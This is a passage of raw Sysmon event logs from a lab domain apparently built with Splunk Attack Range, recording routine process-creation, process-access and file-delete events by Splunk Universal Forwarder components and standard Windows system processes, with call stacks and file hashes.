Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.465{466BC892-F32F-60EB-F97C-00000000CF01}4712C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.194{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A013AF3AE0DE6E1A33AB4F41737FD76,SHA256=7B03CF5E2930A06A49BB2381DA1C4A4632E01A49307BB8AD0DD1E02D6C1D1AF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:51.194{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EAC9D93D5FD6D082CB55C8826AB0AF84,SHA256=45E8F5F835C940D9E65CF94B094786EB923D4A56AF34FE9B77B5AFC8922F6321,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:51.132{466BC892-F32E-60EB-F87C-00000000CF01}90009592C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B7CAE02A70C67338930F82788DA4CF0,SHA256=9434D7230A72CA32D49E9AED8C35C7390BF4E2D0B3C92CF658674E3B729E439C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806386Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:52.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF1DD5A1FE797C9DFD5AD184330B0781,SHA256=DD4E20E4D85FCD88B0261AF90D720A94DCA01097B3D6E17A75643B376DDAF898,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.896{466BC892-F330-60EB-FB7C-00000000CF01}90288812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F330-60EB-FB7C-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:52.711{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:52.711{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F330-60EB-FB7C-00000000CF01}9028C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.711{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F330-60EB-FB7C-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.697{466BC892-F330-60EB-FB7C-00000000CF01}9028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.463{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A013AF3AE0DE6E1A33AB4F41737FD76,SHA256=7B03CF5E2930A06A49BB2381DA1C4A4632E01A49307BB8AD0DD1E02D6C1D1AF3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F330-60EB-FA7C-00000000CF01}8072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:52.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:52.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F330-60EB-FA7C-00000000CF01}8072C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.079{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F330-60EB-FA7C-00000000CF01}8072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:52.065{466BC892-F330-60EB-FA7C-00000000CF01}8072C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806388Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:53.427{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B35052B96BFDB4DF82D8B0EB9E811AF,SHA256=8A89854DD0D52E5BE50D71266D8A721AF09999B091AB29A48A9AB20B3FE51267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.711{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=182BA307A104E82F6A0AE0E847E70D83,SHA256=C465CD60D91C85C6E691909EA7A23E9EB1A6A9D0C43B2A1B9E647582099A4B93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.629{466BC892-F331-60EB-FC7C-00000000CF01}79768408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.395{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F331-60EB-FC7C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.380{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F331-60EB-FC7C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:53.380{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.380{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
